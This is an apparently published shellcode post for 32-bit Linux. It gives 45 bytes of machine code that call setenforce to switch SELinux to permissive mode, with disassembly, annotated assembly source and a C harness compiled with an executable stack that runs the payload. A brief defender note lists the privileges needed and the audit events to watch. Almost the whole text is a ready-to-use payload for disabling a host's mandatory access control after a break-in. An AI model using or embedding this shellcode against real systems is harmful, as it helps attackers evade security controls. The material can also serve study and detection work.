# Title: x86 SELinux change between permissive and enforcing modes shellcode
# Date: 20-02-2017
# Author: Krzysztof Przybylski
# Platform: Lin_x86
# Tested on: CentOS 6.8 (i686)
# Shellcode Size: 45 bytes
# ID: SLAE - 871
/*
1. Description:
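SELinux mode switcher: the shellcode runs /usr/sbin/setenforce with a single-character argument. The argument byte (on its own line in the C array below) selects the mode: "\x30" ('0') = Permissive, "\x31" ('1') = Enforcing.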
gcc -fno-stack-protector -z execstack SELinux-mode.c -o SELinux-mode
2. Disassembly of section .text:
08048060 <_start>:
8048060: 6a 0b push 0xb
8048062: 58 pop eax
8048063: 31 d2 xor edx,edx
8048065: 52 push edx
8048066: 6a 30 push 0x30
8048068: 89 e1 mov ecx,esp
804806a: 52 push edx
804806b: 68 6f 72 63 65 push 0x6563726f
8048070: 68 74 65 6e 66 push 0x666e6574
8048075: 68 6e 2f 73 65 push 0x65732f6e
804807a: 68 2f 73 62 69 push 0x6962732f
804807f: 68 2f 75 73 72 push 0x7273752f
8048084: 89 e3 mov ebx,esp
8048086: 52 push edx
8048087: 51 push ecx
8048088: 53 push ebx
8048089: 89 e1 mov ecx,esp
804808b: cd 80 int 0x80
3. Code
; Target: Linux x86 (32-bit), int 0x80 system-call interface, NASM syntax.
;
; Builds the string "/usr/sbin/setenforce" and a one-character argument on
; the stack, then issues system call 0xb (execve on 32-bit Linux):
;     execve("/usr/sbin/setenforce", { path, "0", NULL }, NULL)
;
; Registers at the int 0x80:
;     eax = 0xb          system-call number
;     ebx = path         pointer to the NUL-terminated program path
;     ecx = argv         pointer to { path, arg, NULL }
;     edx = 0            envp = NULL; also reused as the source of zero dwords
;
; There is no error path: if the system call returns, execution continues
; into whatever bytes follow the int 0x80.
;
; Defender notes: setenforce only succeeds for a caller that is already
; allowed to change the SELinux mode (normally root in a domain holding the
; setenforce permission), so this is a post-compromise step, not a privilege
; escalation. An execve of /usr/sbin/setenforce from an unexpected parent and
; an audit MAC_STATUS record are the events to alert on; the
; secure_mode_policyload boolean can be used to block runtime mode changes.
global _start
section .text
_start:
push 0xb                ; eax = 0xb via push/pop; the encoding (6a 0b 58) has no zero bytes
pop eax
xor edx, edx            ; edx = 0: envp and the source of every NUL/NULL below
push edx                ; zero dword, sits just above the argument string
push byte 0x30          ; stores 30 00 00 00: the string "0" (0x31 would be "1")
mov ecx, esp            ; ecx = pointer to the argument string (saved into argv below)
push edx                ; zero dword that terminates the 20-character path
push 0x6563726f         ; "orce"  (path is pushed last chunk first)
push 0x666e6574         ; "tenf"
push 0x65732f6e         ; "n/se"
push 0x6962732f         ; "/sbi"
push 0x7273752f         ; "/usr"
mov ebx, esp            ; ebx = pointer to "/usr/sbin/setenforce"
push edx                ; argv[2] = NULL
push ecx                ; argv[1] = pointer to the argument string
push ebx                ; argv[0] = pointer to the path
mov ecx, esp            ; ecx = argv
int 0x80                ; system call with eax = 0xb
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x6a\x0b\x58\x31\xd2\x52\x6a"
"\x30"
"\x89\xe1\x52\x68\x6f\x72\x63\x65"
"\x68\x74\x65\x6e\x66\x68\x6e\x2f"
"\x73\x65\x68\x2f\x73\x62\x69\x68"
"\x2f\x75\x73\x72\x89\xe3\x52\x51"
"\x53\x89\xe1\xcd\x80";
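/*
 * Test harness for the byte array `code`.
 *
 * Prints the payload length, then calls the array as if it were a function.
 * The call only works when the memory holding `code` is executable, which is
 * what the -z execstack flag in the build line at the top of this page is
 * for; in a default (non-executable data) build the call is expected to
 * fault instead.
 *
 * Returns 0 if control ever comes back from the payload.
 */
int main(void)
{
    /* strlen() takes const char * and returns size_t: cast the unsigned
     * char array and print with %zu rather than %d. */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Reinterpret the data array as a function and transfer control to it. */
    int (*ret)() = (int(*)())code;
    ret();

    return 0;
}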